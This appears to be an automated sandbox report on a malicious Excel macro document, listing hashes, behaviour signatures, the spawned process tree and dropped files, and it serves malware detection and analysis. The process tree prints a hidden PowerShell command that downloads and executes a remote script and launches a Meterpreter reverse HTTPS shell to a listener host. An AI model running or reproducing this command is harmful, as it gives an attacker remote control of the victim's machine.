Analysis

  • max time kernel
    24s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    10-07-2024 21:50

General

  • Target

    473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls

  • Size

    44KB

  • MD5

    3d2b24d0a1db0e82fa1f254924128354

  • SHA1

    1cecd46eac6c6aadbb5fb6a1869337328400e745

  • SHA256

    473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac

  • SHA512

    3a8c459a1d67f69b7558832821cc78a3f4571597a9ce4969edc9aea4947ff791b1fe47206c0ef229c5e3f5d13f632c33358be3198ba260a5123c5fd72d644948

  • SSDEEP

    768:Stvo+eUk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJET+juFlmQQcAOJ9acv9acyL:6/k3hbdlylKsgqopeJBWhZFGkE+cL2Ni

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:840
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2552

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZFDFAA2G89Y8RBFL72IM.temp

    Filesize

    7KB

    MD5

    82460860ad1a71cb7a0cf84af75ef5e4

    SHA1

    a4f1742fc9d139acc2f8d974ff501a48a9cad1e2

    SHA256

    b158f4e2aabf9dd6534a624cfb9985002a1c5a78abf2b715f823ab20442904b7

    SHA512

    a4911f79ae521b938bcfc82720a4e4cee9846457a19684e7e109cbf13ecefc3a395cd8bfdf2288ab939f8c04a858166b04e756f0b37746bb7ef641819395912d

  • C:\Users\Public\config.vbs

    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

  • memory/656-49-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-18-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-38-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-37-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/656-1-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB

  • memory/656-48-0x0000000072BED000-0x0000000072BF8000-memory.dmp

    Filesize

    44KB

  • memory/656-17-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-50-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-51-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/656-52-0x00000000062D0000-0x00000000063D0000-memory.dmp

    Filesize

    1024KB

  • memory/2552-45-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

  • memory/2552-44-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB